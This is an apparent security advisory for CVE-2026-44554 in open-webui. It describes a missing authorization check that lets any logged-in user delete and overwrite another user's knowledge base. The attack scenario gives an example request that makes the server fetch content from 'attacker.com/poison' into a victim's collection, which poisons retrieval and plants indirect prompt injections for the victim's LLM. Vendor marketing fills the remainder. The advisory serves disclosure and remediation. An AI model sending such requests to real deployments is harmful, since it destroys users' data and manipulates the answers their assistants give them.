Summary
Knowledge Base Destruction and RAG Poisoning via Unauthorized Collection Overwrite
Affected Component
Retrieval web/YouTube processing endpoints:
backend/open_webui/routers/retrieval.py(lines 1810-1837,process_web)backend/open_webui/routers/retrieval.py(the parallelprocess_youtubeendpoint)backend/open_webui/routers/retrieval.py(line 1445,save_docs_to_vector_dbcall chain)
Affected Versions
Current main branch (commit 6fdd19bf1) and likely all versions with RAG/knowledge base functionality.
Description
The POST /api/v1/retrieval/process/web endpoint accepts a user-supplied collection_name and an overwrite query parameter (default: True). It performs no authorization check on whether the calling user owns or has write access to the target collection. When overwrite=True, save_docs_to_vector_db calls VECTOR_DB_CLIENT.delete_collection() on the target collection before writing new content.
Combined with the knowledge base enumeration vulnerability (separate report), an attacker can trivially discover any user's knowledge base UUID and then destroy or poison it.
# retrieval.py:1810-1837, no collection authorization check
@router.post('/process/web')
async def process_web(
request: Request,
form_data: ProcessUrlForm,
user=Depends(get_verified_user),
...
):
# ... fetch and process the URL ...
save_docs_to_vector_db(
request=request,
docs=docs,
collection_name=form_data.collection_name, # attacker-controlled, unchecked
overwrite=overwrite, # defaults to True
...
)
CVSS 3.1 Breakdown
| Metric | Value | Rationale |
|---|---|---|
| Attack Vector | Network (N) | Exploited remotely via API call |
| Attack Complexity | Low (L) | Single API call with a known KB UUID |
| Privileges Required | Low (L) | Requires any authenticated user account |
| User Interaction | None (N) | No victim interaction required |
| Scope | Unchanged (U) | Impact within the knowledge base authorization boundary |
| Confidentiality | None (N) | No data disclosure from this vulnerability directly |
| Integrity | High (H) | Complete replacement of victim's KB content with attacker-controlled data |
| Availability | High (H) | Victim's original KB embeddings are deleted; KB effectively destroyed |
Attack Scenario
- Attacker discovers victim's KB UUID via the
knowledge-basesmeta-collection (separate finding) or other enumeration. - Attacker sends:
POST /api/v1/retrieval/process/web?overwrite=true { "url": "https://attacker.com/poison", "collection_name": "<victim_kb_uuid>" } - The endpoint fetches content from the attacker's URL.
save_docs_to_vector_dbdeletes the entire vector collection belonging to the victim's knowledge base.- The attacker's fetched content is embedded and written as the new collection content.
- Victim's RAG queries against their KB now return attacker-controlled content instead of their original documents.
Preconditions
- Attacker must have a valid user account
- Attacker must know the target collection name (KB UUID), easily obtained via the
knowledge-basesenumeration finding
Impact
- Data destruction: Victim's original KB embeddings are permanently deleted from the vector store
- RAG poisoning: Attacker-controlled content replaces legitimate knowledge, causing the LLM to return misleading or malicious answers to the victim
- Indirect prompt injection: Poisoned content can contain crafted prompts that manipulate the victim's LLM behavior when queried
- Persistence: The poisoned content persists until the KB is rebuilt from source files
The application does not perform an authorization check before performing a sensitive operation. Typical impact: unauthorized access to restricted functionality or data.
CVE-2026-44554 has a CVSS score of 8.1 (High). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.9.0); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-44554? CVE-2026-44554 is a high-severity missing authorization vulnerability in open-webui (pip), affecting versions <= 0.8.12. It is fixed in 0.9.0. The application does not perform an authorization check before performing a sensitive operation.
- How severe is CVE-2026-44554? CVE-2026-44554 has a CVSS score of 8.1 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of open-webui are affected by CVE-2026-44554? open-webui (pip) versions <= 0.8.12 is affected.
- Is there a fix for CVE-2026-44554? Yes. CVE-2026-44554 is fixed in 0.9.0. Upgrade to this version or later.
- Is CVE-2026-44554 exploitable, and should I be worried? Whether CVE-2026-44554 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-44554 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-44554? Upgrade
open-webuito 0.9.0 or later.